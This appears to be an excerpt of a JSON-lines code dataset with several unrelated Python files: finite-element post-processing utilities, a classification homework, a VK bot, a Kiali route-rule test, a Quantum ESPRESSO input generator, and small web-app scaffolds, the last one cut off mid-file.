blocks_name : str\r\n Name of set for solid elements.\r\n\r\n Returns\r\n -------\r\n None\r\n\r\n Notes\r\n -----\r\n - Extrusion is along the Mesh vertex normals.\r\n\r\n \"\"\"\r\n\r\n ki = {}\r\n blocks = []\r\n mesh_faces = []\r\n links = []\r\n\r\n for key in mesh.vertices():\r\n\r\n normal = normalize_vector(mesh.vertex_normal(key))\r\n xyz = mesh.vertex_coordinates(key)\r\n ki['{0}_0'.format(key)] = structure.add_node(xyz)\r\n\r\n for i in range(layers):\r\n xyzi = add_vectors(xyz, scale_vector(normal, (i + 1) * thickness))\r\n ki['{0}_{1}'.format(key, i + 1)] = structure.add_node(xyzi)\r\n\r\n if links_name:\r\n node1 = ki['{0}_0'.format(key)]\r\n node2 = ki['{0}_{1}'.format(key, i + 1)]\r\n ez = normalize_vector(subtract_vectors(xyzi, xyz))\r\n try: # check\r\n ey = cross_vectors(ez, [1, 0, 0])\r\n except:\r\n pass\r\n ekey = structure.add_element(nodes=[node1, node2], type='SpringElement', acoustic=False, thermal=False,\r\n axes={'ez': ez, 'ey': ey})\r\n structure.elements[ekey].A = mesh.vertex_area(key)\r\n links.append(ekey)\r\n\r\n for face in mesh.faces():\r\n\r\n vs = mesh.face_vertices(face)\r\n\r\n for i in range(layers):\r\n bot = ['{0}_{1}'.format(j, i + 0) for j in vs]\r\n top = ['{0}_{1}'.format(j, i + 1) for j in vs]\r\n\r\n if blocks_name:\r\n if len(vs) == 3:\r\n etype = 'PentahedronElement'\r\n elif len(vs) == 4:\r\n etype = 'HexahedronElement'\r\n nodes = [ki[j] for j in bot + top]\r\n ekey = structure.add_element(nodes=nodes, type=etype, acoustic=False, thermal=False)\r\n blocks.append(ekey)\r\n\r\n if (i == layers - 1) and mesh_name:\r\n nodes = [ki[j] for j in top]\r\n ekey = structure.add_element(nodes=nodes, type='ShellElement', acoustic=False, thermal=False)\r\n mesh_faces.append(ekey)\r\n\r\n if blocks_name:\r\n structure.add_set(name=blocks_name, type='element', selection=blocks)\r\n if mesh_name:\r\n structure.add_set(name=mesh_name, type='element', selection=mesh_faces)\r\n if links:\r\n structure.add_set(name=links_name, type='element', selection=links)\r\n\r\n\r\ndef group_keys_by_attribute(adict, name, tol='3f'):\r\n\r\n \"\"\" Make group keys by shared attribute values.\r\n\r\n Parameters\r\n ----------\r\n adict : dic\r\n Attribute dictionary.\r\n name : str\r\n Attribute of interest.\r\n tol : float\r\n Float tolerance.\r\n\r\n Returns\r\n -------\r\n dic\r\n Group dictionary.\r\n\r\n \"\"\"\r\n\r\n groups = {}\r\n for key, item in adict.items():\r\n if name in item:\r\n value = item[name]\r\n if type(value) == float:\r\n value = '{0:.{1}}'.format(value, tol)\r\n groups.setdefault(value, []).append(key)\r\n return groups\r\n\r\n\r\ndef group_keys_by_attributes(adict, names, tol='3f'):\r\n\r\n \"\"\" Make group keys by shared values of attributes.\r\n\r\n Parameters\r\n ----------\r\n adict : dic\r\n Attribute dictionary.\r\n name : str\r\n Attributes of interest.\r\n tol : float\r\n Float tolerance.\r\n\r\n Returns\r\n -------\r\n dic\r\n Group dictionary.\r\n\r\n \"\"\"\r\n\r\n groups = {}\r\n for key, item in adict.items():\r\n values = []\r\n for name in names:\r\n if name in item:\r\n value = item[name]\r\n if type(value) == float:\r\n value = '{0:.{1}}'.format(value, tol)\r\n else:\r\n value = str(value)\r\n else:\r\n value = '-'\r\n values.append(value)\r\n vkey = '_'.join(values)\r\n groups.setdefault(vkey, []).append(key)\r\n return groups\r\n\r\n\r\ndef network_order(start, structure, network):\r\n\r\n \"\"\" Extract node and element orders from a Network for a given start-point.\r\n\r\n Parameters\r\n ----------\r\n start : list\r\n Start point co-ordinates.\r\n structure : obj\r\n Structure object.\r\n network : obj\r\n Network object.\r\n\r\n Returns\r\n -------\r\n list\r\n Ordered nodes.\r\n list\r\n Ordered elements.\r\n list\r\n Cumulative lengths at element mid-points.\r\n float\r\n Total length.\r\n\r\n \"\"\"\r\n\r\n gkey_key = network.gkey_key()\r\n start = gkey_key[geometric_key(start, '{0}f'.format(structure.tol))]\r\n leaves = network.leaves()\r\n leaves.remove(start)\r\n end = leaves[0]\r\n\r\n adjacency = {i: network.vertex_neighbours(i) for i in network.vertices()}\r\n weight = {(u, v): 1 for u, v in network.edges()}\r\n weight.update({(v, u): weight[(u, v)] for u, v in network.edges()})\r\n path = dijkstra_path(adjacency, weight, start, end)\r\n nodes = [structure.check_node_exists(network.vertex_coordinates(i)) for i in path]\r\n elements, arclengths, length = [], [], 0\r\n\r\n for i in range(len(nodes) - 1):\r\n sp = nodes[i]\r\n ep = nodes[i + 1]\r\n elements.append(structure.check_element_exists([sp, ep]))\r\n xyz_sp = structure.node_xyz(sp)\r\n xyz_ep = structure.node_xyz(ep)\r\n dL = distance_point_point(xyz_sp, xyz_ep)\r\n arclengths.append(length + dL / 2.)\r\n length += dL\r\n\r\n return nodes, elements, arclengths, length\r\n\r\n\r\ndef normalise_data(data, cmin, cmax):\r\n\r\n \"\"\" Normalise a vector of data to between -1 and 1.\r\n\r\n Parameters\r\n ----------\r\n data : array\r\n Raw data.\r\n cmin : float\r\n Cap data values >= cmin.\r\n cmax : float\r\n Cap data values <= cmax.\r\n\r\n Returns\r\n -------\r\n array\r\n -1 to 1 scaled data.\r\n float\r\n The maximum absolute unscaled value.\r\n\r\n \"\"\"\r\n\r\n f = asarray(data)\r\n fmax = cmax if cmax is not None else max(abs(f))\r\n fmin = cmin if cmin is not None else min(abs(f))\r\n fabs = max([abs(fmin), abs(fmax)])\r\n fscaled = f / fabs if fabs else f\r\n fscaled[fscaled > +1] = +1\r\n fscaled[fscaled < -1] = -1\r\n\r\n return fscaled, fabs\r\n\r\n\r\ndef postprocess(nodes, elements, ux, uy, uz, data, dtype, scale, cbar, ctype, iptype, nodal):\r\n\r\n \"\"\" Post-process data from analysis results for given step and field.\r\n\r\n Parameters\r\n ----------\r\n nodes : list\r\n [[x, y, z], ..] co-ordinates of each node.\r\n elements : list\r\n Node numbers that each element connects.\r\n ux : list\r\n List of nodal x displacements.\r\n uy : list\r\n List of nodal y displacements.\r\n uz : list\r\n List of nodal z displacements.\r\n data : dic\r\n Unprocessed data.\r\n dtype : str\r\n 'nodal' or 'element'.\r\n scale : float\r\n Scale displacements for the deformed plot.\r\n cbar : list\r\n Minimum and maximum limits on the colorbar.\r\n ctype : int\r\n RGB color type, 1 or 255.\r\n iptype : str\r\n 'mean', 'max' or 'min' of an element's integration point data.\r\n nodal : str\r\n 'mean', 'max' or 'min' for nodal values.\r\n\r\n Returns\r\n -------\r\n float\r\n Time taken to process data.\r\n list\r\n Scaled deformed nodal co-ordinates.\r\n list\r\n Nodal colors.\r\n float\r\n Absolute maximum nodal data value.\r\n list\r\n Normalised data values.\r\n list\r\n Element colors.\r\n float\r\n Absolute maximum element data value.\r\n\r\n \"\"\"\r\n\r\n tic = time()\r\n\r\n dU = hstack([array(ux)[:, newaxis], array(uy)[:, newaxis], array(uz)[:, newaxis]])\r\n U = [list(i) for i in list(array(nodes) + scale * dU)]\r\n\r\n vn, ve = process_data(data=data, dtype=dtype, iptype=iptype, nodal=nodal, elements=elements, n=len(U))\r\n\r\n fscaled, fabs = normalise_data(data=vn, cmin=cbar[0], cmax=cbar[1])\r\n cnodes = colorbar(fsc=fscaled, input='array', type=ctype)\r\n\r\n if dtype == 'element':\r\n escaled, eabs = normalise_data(data=ve, cmin=cbar[0], cmax=cbar[1])\r\n celements = colorbar(fsc=escaled, input='array', type=ctype)\r\n celements_ = [list(i) for i in list(celements)]\r\n else:\r\n eabs = 0\r\n celements_ = []\r\n\r\n toc = time() - tic\r\n cnodes_ = [list(i) for i in list(cnodes)]\r\n fabs_ = float(fabs)\r\n fscaled_ = [float(i) for i in list(fscaled)]\r\n\r\n return toc, U, cnodes_, fabs_, fscaled_, celements_, float(eabs)\r\n\r\n\r\ndef process_data(data, dtype, iptype, nodal, elements, n):\r\n\r\n \"\"\" Process the raw data.\r\n\r\n Parameters\r\n ----------\r\n data : dic\r\n Unprocessed data.\r\n dtype : str\r\n 'nodal' or 'element'.\r\n iptype : str\r\n 'mean', 'max' or 'min' of an element's integration point data.\r\n nodal : str\r\n 'mean', 'max' or 'min' for nodal values.\r\n elements : list\r\n Node numbers that each element connects.\r\n n : int\r\n Number of nodes.\r\n\r\n Returns\r\n -------\r\n array\r\n Data values for each node.\r\n array\r\n Data values for each element.\r\n\r\n \"\"\"\r\n\r\n if dtype == 'nodal':\r\n vn = array(data)[:, newaxis]\r\n ve = None\r\n\r\n elif dtype == 'element':\r\n m = len(elements)\r\n ve = zeros((m, 1))\r\n\r\n for ekey, item in data.items():\r\n fdata = [i for i in item.values() if i is not None]\r\n if not fdata:\r\n fdata = [0]\r\n if iptype == 'max':\r\n v = max(fdata)\r\n elif iptype == 'min':\r\n v = min(fdata)\r\n elif iptype == 'mean':\r\n v = sum(fdata) / len(fdata)\r\n ve[int(ekey)] = v\r\n\r\n rows, cols = [], []\r\n for c, i in enumerate(elements):\r\n rows.extend([c] * len(i))\r\n cols.extend(i)\r\n sdata = [1] * len(rows)\r\n A = csr_matrix((sdata, (rows, cols)), shape=(m, n))\r\n AT = A.transpose()\r\n\r\n if nodal == 'mean':\r\n vsum = asarray(AT.dot(ve))\r\n vn = vsum / sum(AT, 1)\r\n else:\r\n vn = zeros((n, 1))\r\n ATa = AT.todense()\r\n for i in range(n):\r\n row = ATa[i, :].transpose()\r\n col = (row == 1)\r\n val = ve[col]\r\n if nodal == 'max':\r\n vn[i] = max(val)\r\n elif nodal == 'min':\r\n vn[i] = min(val)\r\n\r\n return vn, ve\r\n\r\n\r\ndef plotvoxels(values, U, vdx, plot=True, indexing=None):\r\n\r\n \"\"\" Plot values as voxel data.\r\n\r\n Parameters\r\n ----------\r\n values : array\r\n Normalised data at nodes.\r\n U : array\r\n Nodal co-ordinates.\r\n vdx : float\r\n Representative volume size for a voxel.\r\n plot : str\r\n Plot voxels using compas VtkVoxels 'vtk'.\r\n\r\n Returns\r\n -------\r\n None\r\n\r\n \"\"\"\r\n\r\n U = array(U)\r\n x = U[:, 0]\r\n y = U[:, 1]\r\n z = U[:, 2]\r\n xmin, xmax = min(x), max(x)\r\n ymin, ymax = min(y), max(y)\r\n zmin, zmax = min(z), max(z)\r\n X = linspace(xmin, xmax, (xmax - xmin) / vdx)\r\n Y = linspace(ymin, ymax, (ymax - ymin) / vdx)\r\n Z = linspace(zmin, zmax, (zmax - zmin) / vdx)\r\n Xm, Ym, Zm = meshgrid(X, Y, Z)\r\n if indexing:\r\n Zm, Ym, Xm = meshgrid(X, Y, Z, indexing='ij')\r\n\r\n f = abs(asarray(values))\r\n Am = squeeze(griddata(U, f, (Xm, Ym, Zm), method='linear', fill_value=0))\r\n Am[isnan(Am)] = 0\r\n\r\n if plot == 'vtk':\r\n voxels = VtkVoxels(data=Am)\r\n voxels.start()\r\n\r\n return Am\r\n\r\n\r\ndef tets_from_vertices_faces(vertices, faces, volume=None):\r\n\r\n \"\"\" Generate tetrahedron points and elements with MeshPy (TetGen).\r\n\r\n Parameters\r\n ----------\r\n vertices : list\r\n List of lists of vertex co-ordinates for input surface mesh.\r\n faces : list\r\n List of lists of face indices for input surface mesh.\r\n volume : float\r\n Volume constraint for each tetrahedron element.\r\n\r\n Returns\r\n -------\r\n list\r\n Points of the tetrahedrons.\r\n list\r\n Indices of points for each tetrahedron element.\r\n\r\n \"\"\"\r\n\r\n try:\r\n info = MeshInfo()\r\n info.set_points(vertices)\r\n info.set_facets(faces)\r\n tets = build(info, max_volume=volume)\r\n tets_points = [list(i) for i in list(tets.points)]\r\n tets_elements = [list(i) for i in list(tets.elements)]\r\n return tets_points, tets_elements\r\n except:\r\n print('***** MeshPy failed *****')\r\n\r\n\r\ndef principal_stresses(data, ptype, scale, rotate):\r\n\r\n \"\"\" Performs principal stress calculations.\r\n\r\n Parameters\r\n ----------\r\n data : dic\r\n Element data from structure.results for the Step.\r\n ptype : str\r\n 'max' 'min' for maximum or minimum principal stresses.\r\n scale : float\r\n Scale on the length of the vectors.\r\n rotate : int\r\n Rotate lines by 90 deg, 0 or 1.\r\n\r\n Returns\r\n -------\r\n array\r\n Vectors for section point 1.\r\n array\r\n Vectors for section point 5.\r\n array\r\n Principal stresses for section point 1.\r\n array\r\n Principal stresses for section point 5.\r\n\r\n \"\"\"\r\n\r\n axes = data['axes']\r\n s11 = data['sxx']\r\n s22 = data['syy']\r\n s12 = data['sxy']\r\n spr = data['s{0}p'.format(ptype)]\r\n\r\n ekeys = spr.keys()\r\n m = len(ekeys)\r\n s11_sp1 = zeros(m)\r\n s22_sp1 = zeros(m)\r\n s12_sp1 = zeros(m)\r\n spr_sp1 = zeros(m)\r\n s11_sp5 = zeros(m)\r\n s22_sp5 = zeros(m)\r\n s12_sp5 = zeros(m)\r\n spr_sp5 = zeros(m)\r\n e11 = zeros((m, 3))\r\n e22 = zeros((m, 3))\r\n\r\n for ekey in ekeys:\r\n i = int(ekey)\r\n e11[i, :] = axes[ekey][0]\r\n e22[i, :] = axes[ekey][1]\r\n s11_sp1[i] = s11[ekey]['ip1_sp1']\r\n s22_sp1[i] = s22[ekey]['ip1_sp1']\r\n s12_sp1[i] = s12[ekey]['ip1_sp1']\r\n spr_sp1[i] = spr[ekey]['ip1_sp1']\r\n s11_sp5[i] = s11[ekey]['ip1_sp5']\r\n s22_sp5[i] = s22[ekey]['ip1_sp5']\r\n s12_sp5[i] = s12[ekey]['ip1_sp5']\r\n spr_sp5[i] = spr[ekey]['ip1_sp5']\r\n\r\n th1 = tile((0.5 * arctan2(s12_sp1, 0.5 * (s11_sp1 - s22_sp1)) + 0.5 * pi * rotate)[:, newaxis], (1, 3))\r\n th5 = tile((0.5 * arctan2(s12_sp5, 0.5 * (s11_sp5 - s22_sp5)) + 0.5 * pi * rotate)[:, newaxis], (1, 3))\r\n er1 = e11 * cos(th1) + e22 * sin(th1)\r\n er5 = e11 * cos(th5) + e22 * sin(th5)\r\n vec1 = er1 * (tile(spr_sp1[:, newaxis], (1, 3)) * scale / 10**7 + 0.0001)\r\n vec5 = er5 * (tile(spr_sp5[:, newaxis], (1, 3)) * scale / 10**7 + 0.0001)\r\n\r\n return vec1, vec5, spr_sp1, spr_sp5\r\n\r\n\r\n# ==============================================================================\r\n# Debugging\r\n# ==============================================================================\r\n\r\nif __name__ == \"__main__\":\r\n\r\n pass\r\n","sub_path":"src/compas_fea/utilities/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":23702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"274895091","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nx_data = pd.read_csv(\"./resource/X_train\", encoding=\"big5\").iloc[:, 1:]\r\nx = np.array(x_data)\r\n\r\ny_data = pd.read_csv(\"./resource/Y_train\", encoding=\"big5\").iloc[:, 1:]\r\ny = np.array(y_data)\r\n\r\nX_train = x\r\nY_train = y\r\ndata_dim = X_train.shape[1]\r\n\r\n\r\ndef sigmoid(a):\r\n return 1 / (1 + np.exp(-a))\r\n\r\n\r\ndef accuracy(y_pred, y_label):\r\n return ((y_label - y_pred.reshape(y_label.shape)) == 0).sum() / y_label.size\r\n\r\n\r\n\"\"\"discriminative\"\"\"\r\nmean_x = np.mean(x, axis=0)\r\nstd_x = np.std(x, axis=0)\r\nfor i in range(len(x)):\r\n x[i] = (x[i] - mean_x) / (std_x + 1e-8)\r\n\r\nx = np.concatenate((np.ones([x.shape[0], 1]), x), axis=1)\r\nw = np.zeros([x.shape[1], 1])\r\n\r\nlearning_rate = 0.001\r\niter_time = 101\r\n\r\nfor t in range(iter_time):\r\n w -= learning_rate / np.sqrt(t + 1) * np.dot(x.T, sigmoid(np.dot(x, w)) - y)\r\n if t % 100 == 0:\r\n print(accuracy(np.round(sigmoid(np.dot(x, w))), y))\r\n\r\n\"\"\"generative【*未掌握】\"\"\"\r\nx = x[:, 1:]\r\n# Compute in-class mean\r\nX_train_0 = np.array([x for x, y in zip(X_train, Y_train) if y == 0])\r\nX_train_1 = np.array([x for x, y in zip(X_train, Y_train) if y == 1])\r\n\r\nmean_0 = np.mean(X_train_0, axis=0)\r\nmean_1 = np.mean(X_train_1, axis=0)\r\n\r\n# Compute in-class covariance\r\ncov_0 = np.zeros((data_dim, data_dim))\r\ncov_1 = np.zeros((data_dim, data_dim))\r\n\r\nfor _x in X_train_0:\r\n cov_0 += np.dot(np.transpose([_x - mean_0]), [_x - mean_0]) / X_train_0.shape[0]\r\nfor _x in X_train_1:\r\n cov_1 += np.dot(np.transpose([_x - mean_1]), [_x - mean_1]) / X_train_1.shape[0]\r\n\r\n# Shared covariance is taken as a weighted average of individual in-class covariance.\r\ncov = (cov_0 * X_train_0.shape[0] + cov_1 * X_train_1.shape[0]) / (X_train_0.shape[0] + X_train_1.shape[0])\r\n\r\n# Compute inverse of covariance matrix.\r\n# Since covariance matrix may be nearly singular, np.linalg.inv() may give a large numerical error.\r\n# Via SVD decomposition, one can get matrix inverse efficiently and accurately.\r\nu, s, v = np.linalg.svd(cov, full_matrices=False)\r\ninv = np.matmul(v.T * 1 / s, u.T)\r\n\r\n# Directly compute weights and bias\r\nw = np.dot(inv, mean_0 - mean_1)\r\nb = (-0.5) * np.dot(mean_0, np.dot(inv, mean_0)) + 0.5 * np.dot(mean_1, np.dot(inv, mean_1)) \\\r\n + np.log(float(X_train_0.shape[0]) / X_train_1.shape[0])\r\n\r\n\r\ndef _f(X, w, b):\r\n return sigmoid(np.matmul(X, w) + b)\r\n\r\n\r\ndef _predict(X, w, b):\r\n return np.round(_f(X, w, b)).astype(np.int)\r\n\r\n\r\n# Compute accuracy on training set\r\nY_train_pred = 1 - _predict(X_train, w, b)\r\nprint('Training accuracy: {}'.format(accuracy(Y_train_pred, Y_train)))\r\n","sub_path":"src/hw2_classification/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"547646386","text":"import vk\nimport operator\nimport argparse\nimport datetime\nimport logging\nfrom importlib.machinery import SourceFileLoader\nfrom mongoengine import connect\n\nfrom luckybot.util.logger import init_logger\nfrom luckybot.model.access_token import AccessToken\nfrom luckybot.model.contest import Contest\n\nfrom distributor import calculate_factor\n\n\n# Функция парсинга аргументов командной строки\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--tokens', type=str, default='objects/access_token.json',\n help='Path to file with access tokens for VK API')\n parser.add_argument('-n', '--number', type=int, default=32,\n help='The number of contests that are sent out daily to moderators')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n try:\n init_logger()\n args = parse_args()\n config = SourceFileLoader('*', 'server.conf').load_module()\n database = connect(db=config.mongo_database, host=config.mongo_host, port=int(config.mongo_port),\n username=config.mongo_username, password=config.mongo_password)\n access_token = AccessToken(args.tokens)\n vk_session = vk.Session(access_token=config.access_token)\n vk_api = vk.API(vk_session, v='5.65', lang='ru')\n\n date = datetime.datetime.combine(datetime.date.today(), datetime.datetime.min.time()) + datetime.timedelta(days=1)\n contests = list(Contest.objects(date=date, city__size=0))\n contest_factor = calculate_factor(contests, access_token)\n contests = sorted(contest_factor.items(), key=operator.itemgetter(1))\n contests.reverse()\n posts = [post_id for post_id, factor in contests[:args.number]]\n message = '
'.join(['[%d] https://vk.com/wall%s' % (index + 1, post_id) for index, post_id in enumerate(posts)])\n\n receivers = vk_api.groups.getMembers(group_id=config.group_id, filter='managers')['items']\n user_ids = ','.join(map(lambda member: str(member['id']), receivers))\n vk_api.messages.send(user_ids=user_ids, message=message)\n except Exception as msg:\n logging.error(str(msg))\n","sub_path":"preview.py","file_name":"preview.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"454527709","text":"import os\nimport conftest\nimport time\n\nPARAMS = {'duration': '1m'}\n\n\ndef test_kiali_route_rules(kiali_client):\n environment_configmap = conftest.__get_environment_config__(conftest.ENV_FILE)\n route_rule_configmap = conftest.__get_environment_config__(conftest.ROUTE_RULE_FILE)\n\n add_command_text = \"oc apply -n \" + environment_configmap.get('mesh_bookinfo_namespace') + \" -f \" + os.path.abspath(os.path.realpath(conftest.ROUTE_RULE_FILE))\n\n add_command_result = os.popen(add_command_text).read()\n\n assert add_command_result.__contains__(\"created\") or add_command_result.__contains__(\"configured\")\n\n graph = kiali_client.graph_namespace(namespace=environment_configmap.get('mesh_bookinfo_namespace'), params=PARAMS)\n\n assert graph is not None\n\n nodes = kiali_client.graph_namespace(namespace=environment_configmap.get('mesh_bookinfo_namespace'), params=PARAMS)[\"elements\"]['nodes']\n\n assert nodes is not None\n\n #route_rule_count = get_route_rule_count(kiali_client, environment_configmap)\n\n assert get_route_rule_count(kiali_client, environment_configmap) > 0\n\n delete_command_text = \"oc delete routerule \" + route_rule_configmap['metadata']['name'] + \" -n \" + environment_configmap.get('mesh_bookinfo_namespace')\n\n delete_command_result = os.popen(delete_command_text).read()\n\n assert delete_command_result.__contains__(\"deleted\")\n\n time.sleep(10)\n\n # Validate that JSON no longer has Route Rules\n assert get_route_rule_count(kiali_client, environment_configmap) == 0\n\ndef get_route_rule_count(kiali_client, environment_configmap):\n\n nodes = kiali_client.graph_namespace(namespace=environment_configmap.get('mesh_bookinfo_namespace'), params=PARAMS)[\n \"elements\"]['nodes']\n\n assert nodes is not None\n\n route_rule_count = 0\n for node in nodes:\n if 'hasRR' in node[\"data\"] and node[\"data\"][\"hasRR\"] == \"true\":\n route_rule_count = route_rule_count + 1\n\n return route_rule_count","sub_path":"tests/test_kiali_route_rules.py","file_name":"test_kiali_route_rules.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"180586619","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 28 21:37:57 2020\n\n@author: yavar02\n\"\"\"\n\nimport os\nimport re\nimport glob\n\nfrom ase.io import read, write\n\n\n\n\ndef qeinpgen(ciffile, guipref, guicalc, guiecut, guiecutrho, guidia, guioccup,\n guismear, guimixmode, guimixbeta, guidegauss, guispin, guimaxstep, guikspace, guipseudo):\n '''\n \n\n Parameters\n ----------\n ciffile : TYPE\n DESCRIPTION.\n guipref : TYPE\n DESCRIPTION.\n guicalc : TYPE\n DESCRIPTION.\n guiecut : TYPE\n DESCRIPTION.\n guiecutrho : TYPE\n DESCRIPTION.\n guidia : TYPE\n DESCRIPTION.\n guioccup : TYPE\n DESCRIPTION.\n guismear : TYPE\n DESCRIPTION.\n guimixmode : TYPE\n DESCRIPTION.\n guimixbeta : TYPE\n DESCRIPTION.\n guidegauss : TYPE\n DESCRIPTION.\n guispin : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n '''\n test=read(ciffile) \n pwiname=ciffile[:-3]+'pwi'\n guiinp_data={'prefix':guipref, 'electron_maxstep':guimaxstep,'outdir':'./','pseudo_dir':'./', 'tstress':True,\n 'tprnfor':True,'calculation':guicalc, 'ecutrho':guiecutrho,'verbosity':'high',\n 'ecutwfc':guiecut, 'diagonalization':guidia, 'occupations':guioccup,\n 'smearing':guismear, 'mixing_mode':guimixmode, 'mixing_beta':guimixbeta,\n 'degauss':guidegauss, 'nspin':guispin}\n\n\n \n \n write(pwiname,test, input_data=guiinp_data, pseudopotentials=guipseudo, kspacing=guikspace, crystal_coordinates=True) \n \n \n return \n \n \n \n \n \n \n \n \n \n ","sub_path":"GUI/aseqeinpgen.py","file_name":"aseqeinpgen.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"576168233","text":"from flor import flags\n\nimport uuid\nfrom pathlib import Path, PurePath\nfrom datetime import datetime\n\nhome = Path.home()\nflorin = home / '.flor'\nflorin.mkdir(exist_ok=True)\n\njob = None\ndata = None\ntimestamp = None\n\n\ndef mk_job(name: str):\n global timestamp, job, data\n assert isinstance(name, str)\n timestamp = datetime.now().isoformat()\n job = florin / name\n job.mkdir(exist_ok=True)\n data = job / PurePath('data')\n data.mkdir(exist_ok=True)\n\n\ndef get_index():\n return job / PurePath(\n flags.INDEX if flags.REPLAY else timestamp\n ).with_suffix('.json')\n\n\ndef get_latest():\n return job / PurePath('latest').with_suffix('.json')\n\n\ndef get_pkl_ref() -> PurePath:\n while True:\n candidate = data / PurePath(uuid.uuid4().hex).with_suffix('.pkl')\n if not candidate.exists():\n return candidate\n\n\ndef verify(path: PurePath):\n assert flags.NAME is not None\n resolved_path = florin / flags.NAME / path \n return Path(resolved_path).exists()\n\n\n","sub_path":"flor/shelf/directory.py","file_name":"directory.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"479044292","text":"list1=[0,1,2,3,4,5,6,7,8,9]\nlist1.reverse()#翻转列表\n#拼接字符串\nlist2=[str(x) for x in list1]#将列表中每个元素转换为字符串\na=''.join(list2)\nb=a[3:9]\nd=b[::-1]\ne=int(d)\n\nf=bin(e)#二进制\ng=oct(e)#八进制\nh=hex(e)#十六进制\nprint(f)\nprint(g)\nprint(h)\n","sub_path":"19100302/7Lou/d5_exercise_array.py","file_name":"d5_exercise_array.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"472033557","text":"\"\"\"\nThe Paster application entry point.\n\"\"\"\n\nfrom datetime import datetime, date\nimport decimal\n\nfrom pyramid.events import BeforeRender\nfrom pyramid.config import Configurator\nfrom pyramid.renderers import JSON\nfrom pyramid.static import QueryStringConstantCacheBuster\n\nfrom clang_ast_webservice import helpers\nfrom clang_ast_webservice.assets import assets_version\n\n\ndef application(_global_config, **settings):\n \"\"\" Returns the Pyramid WSGI application.\n \"\"\"\n\n config = Configurator(settings=settings)\n config.include('pyramid_debugtoolbar')\n config.include('pyramid_mako')\n\n config.add_subscriber(set_renderer_context, BeforeRender)\n\n config.add_static_view(\n name='assets', path='clang_ast_webservice.assets:',\n cache_max_age=2592000)\n config.add_cache_buster(\n 'clang_ast_webservice.assets:',\n QueryStringConstantCacheBuster(assets_version))\n\n config.include(add_json_renderer)\n\n config.include('.index')\n\n return config.make_wsgi_app()\n\n\ndef set_renderer_context(event):\n if not event['renderer_name'].endswith('.mako'):\n return\n event['h'] = helpers\n\n\ndef add_json_renderer(config):\n json_renderer = JSON()\n\n def datetime_adapter(obj, request):\n return \"{}Z\".format(obj.isoformat())\n\n def date_adapter(obj, request):\n return obj.isoformat()\n\n def decimal_adapter(obj, request):\n return str(obj)\n\n json_renderer.add_adapter(datetime, datetime_adapter)\n json_renderer.add_adapter(date, date_adapter)\n json_renderer.add_adapter(decimal.Decimal, decimal_adapter)\n\n config.add_renderer('json', json_renderer)\n","sub_path":"clang_ast_webservice/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"525568502","text":"#!/usr/bin/env python3\n\nimport hashlib\nimport uuid\nimport time\nimport os\nimport requests\nimport threading\nimport datetime\nimport logging\nimport urllib.parse\nimport base64\nimport psycopg2\nimport psycopg2.extras\nimport sys\n# import json\n\nfrom json import dumps, dump, loads, load\nfrom urllib.parse import unquote\nfrom subprocess import check_output\nfrom random import randint\nfrom stdnum import iban\nfrom sanic import Sanic\nfrom sanic import response\nfrom sanic.response import json\nfrom environs import Env\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.sql import update, table, column, select, text\n\n# from sanic_cors import CORS, cross_origin\n# from sanic.log import logger\n# from PIL import Image\n# from databases import Database\n\nlogging_format = \"[%(asctime)s] %(process)d-%(levelname)s \"\nlogging_format += \"%(module)s::%(funcName)s():l%(lineno)d: \"\nlogging_format += \"%(message)s\"\n\nlogging.basicConfig(\n format=logging_format,\n level=logging.INFO\n)\nlog = logging.getLogger()\n\n\nenv = Env()\n# Read .env into os.environ\nenv.read_env()\n\nSettings = {}\n\npwd = os.path.dirname(os.path.abspath(__file__))\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\napp = Sanic(name='a-bu.ch')\n\n# app.config.from_object(Settings)\n# app.config['CORS_AUTOMATIC_OPTIONS'] = True\n\n# CORS(app)\n# cors = CORS(app, automatic_options=True, resources={r\"/v1/*\": {\"origins\": \"sepa.digital\"}})\n# cors = CORS(app, resources={r\"/v1/*\": {\"origins\": \"*\"}})\n\n\n# DB / App setup\ndef setup_database():\n @app.listener('after_server_start')\n # conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n async def connect_to_db(*args, **kwargs):\n # TODO .env\n app.db = psycopg2.connect(\"host='51.158.130.90' port='25120' dbname='abuch' user='' password=''\")\n # app.db.cursor(cursor_factory=psycopg2.extras.DictCursor)\n return app.db\n\n @app.listener('after_server_stop')\n async def disconnect_from_db(*args, **kwargs):\n # app.db.close() # TODO disconnect again \n return True\n #return app.db.disconnect()\n\n\n# tmp helper\nnextDbId = lambda: int(round(time.time() * 10) + randint(10, 1000))\n\n# txUUID = lambda: str(uuid.uuid5(uuid.NAMESPACE_DNS, 'a-bu.ch'))\ntxUUID = lambda: str(uuid.uuid4())\n\n# App routes\n@app.route('/')\ndef service_handle_request(request):\n return response.redirect('/v1/heartbeat')\n\n\n@app.route('/v1/heartbeat')\nasync def service_heartbeat(request):\n return response.json({\"status\": \"up\", \"service\": \"a-bu.ch\", \"time\": 